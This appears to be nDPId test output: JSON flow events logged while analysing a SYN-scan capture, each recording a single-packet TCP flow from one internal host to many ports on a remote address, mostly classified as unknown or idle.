-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 